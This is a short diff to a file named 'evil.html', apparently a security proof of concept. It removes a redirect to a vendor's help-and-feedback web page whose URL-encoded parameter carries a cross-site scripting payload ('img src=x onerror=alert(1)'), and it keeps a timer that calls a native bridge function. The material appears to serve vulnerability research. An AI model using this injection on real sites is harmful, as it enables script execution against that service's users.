--- a/JS/evil.html
+++ b/JS/evil.html
@@ -8,7 +8,7 @@
 <body>
 	<script>
 	function test(){
-		location.href="https://h5hosting-drcn.dbankcdn.cn/cch5/HiCare/sdk-helpAndFeedback/helpAndFeedback/index.html?sysLang=zh-cn&country=CN&appId=1014&typeCode=SF-10044874&isDarkMode=N#/HADKnowledgeDetail?item=%7B%22name%22%3A%22%E6%BF%80%E6%B4%BB%E8%AE%BE%E5%A4%87%E6%97%B6%EF%BC%8C%E5%BF%98%E8%AE%B0%E5%8D%8E%E4%B8%BA%E5%B8%90%E5%8F%B7%E7%9A%84%E5%AF%86%E7%A0%811111111%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E%22,%22url%22%3A%22httptkb.huawei.com%2Fweknow%2Fservlet%2Fshow%2FknowContextServlet%3FknowId%3Dzh-cn15764127%22,%22id%22%3A%22zh-cn15764127%22,%22level%22%3Anull%7D"
+		location.href="https://h5hosting-drcn.dbankcdn.cn/cch5/HiCare/sdk-helpAndFeedback/helpAndFeedback/index.html"
 	}
 	function firststep(){
 		setInterval(callArkTs, 1);
